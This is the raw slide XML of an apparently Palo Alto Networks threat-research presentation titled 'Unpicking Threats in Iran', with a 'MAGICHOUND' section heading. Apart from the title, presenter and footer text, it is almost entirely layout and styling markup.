        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84890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84027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83AF3A-9CD1-4AEC-AE28-A58BC1FA1060}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US"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4383705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5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="19"/>
            <a:ext cx="9143993" cy="5143481"/>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aseline="-25000" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9348" y="6770"/>
            <a:ext cx="9134652" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="5400" b="0" i="1" kern="1200" cap="none" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="+mj-ea"/>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TITLE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269434" y="2181002"/>
            <a:ext cx="5366870" cy="464018"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330097" y="2630098"/>
            <a:ext cx="5583524" cy="555313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="PAN_YELLOW.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50537" y="3788146"/>
            <a:ext cx="2407901" cy="1286285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404671346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788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469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68424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0809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40473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1621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14050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32236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27167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6165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a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317500" y="730758"/>
            <a:ext cx="8471465" cy="38595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7676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33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2993CA60-2B53-4F4B-9B5D-BDFFCE129C5C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Inc.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> Confidential and Proprietary. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360476019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7499" y="757951"/>
            <a:ext cx="4254502" cy="479822"/>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17509" y="1237771"/>
            <a:ext cx="4254499" cy="3387956"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buClr>
                <a:srgbClr val="316989"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1800">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:buClr>
                <a:srgbClr val="316989"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar cha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572000" y="757951"/>
            <a:ext cx="4259510" cy="479822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="18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237771"/>
            <a:ext cx="4259510" cy="3387956"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buClr>
                <a:srgbClr val="316989"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:buClr>
                <a:srgbClr val="316989"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar cha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Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317501" y="205981"/>
            <a:ext cx="8518462" cy="304560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLICK TO EDIT MASTER TITLE STYLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317512" y="510780"/>
            <a:ext cx="8518525" cy="273844"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317501" y="4905604"/>
            <a:ext cx="3436878" cy="218818"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="500" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2993CA60-2B53-4F4B-9B5D-BDFFCE129C5C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Inc.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> Confidential and Proprietary. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241730700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317501" y="4905604"/>
            <a:ext cx="3436878" cy="218818"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="500" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2993CA60-2B53-4F4B-9B5D-BDFFCE129C5C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Inc.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> Confidential and Proprietary. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21579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44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88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2791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26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4.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4873891"/>
            <a:ext cx="9144000" cy="282245"/>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aseline="-25000" dirty="0" err="1">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317539" y="205981"/>
            <a:ext cx="8471427" cy="327420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit master style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317539" y="789882"/>
            <a:ext cx="8471427" cy="38047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317501" y="4905604"/>
            <a:ext cx="3436878" cy="218818"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="500" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2993CA60-2B53-4F4B-9B5D-BDFFCE129C5C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="PAN_YELLOW.png"/>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941545" y="4613335"/>
            <a:ext cx="928351" cy="495919"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2922792811"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483699" r:id="rId1"/>
    <p:sldLayoutId id="2147483708" r:id="rId2"/>
    <p:sldLayoutId id="2147483707" r:id="rId3"/>
    <p:sldLayoutId id="2147483703" r:id="rId4"/>
    <p:sldLayoutId id="2147483705" r:id="rId5"/>
    <p:sldLayoutId id="2147483752" r:id="rId6"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="2000" b="0" i="1" kern="1200" cap="none" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial Black"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Helvetica"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-342900" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="1600"/>
        </a:spcBef>
        <a:buClr>
          <a:srgbClr val="77787B"/>
        </a:buClr>
        <a:buFont typeface="Arial"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:srgbClr val="77787B"/>
        </a:buClr>
        <a:buFont typeface="Arial"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:srgbClr val="77787B"/>
        </a:buClr>
        <a:buFont typeface="Arial"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="16002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4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:srgbClr val="316989"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="18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463567"/>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8293155"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483710" r:id="rId1"/>
    <p:sldLayoutId id="2147483711"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12/12/2018</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993CA60-2B53-4F4B-9B5D-BDFFCE129C5C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117898507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5.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mailto:tlancaster@PALOALTONETWORKS.COM" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.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348" y="6770"/>
            <a:ext cx="7758698" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Unpicking Threats  in Iran</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330097" y="2065255"/>
            <a:ext cx="5366870" cy="464018"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Tom Lancaster</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330097" y="2630098"/>
            <a:ext cx="5583524" cy="555313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Senior Threat Researcher</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7699034" y="151120"/>
            <a:ext cx="1299979" cy="1218730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330097" y="3919210"/>
            <a:ext cx="3472775" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TLP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WHITE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="3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58423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348" y="1925022"/>
            <a:ext cx="9134652" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MAGICHOUND</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138085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1" y="205981"/>
            <a:ext cx="8471427" cy="327420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>MAGICHOUND</a:t>
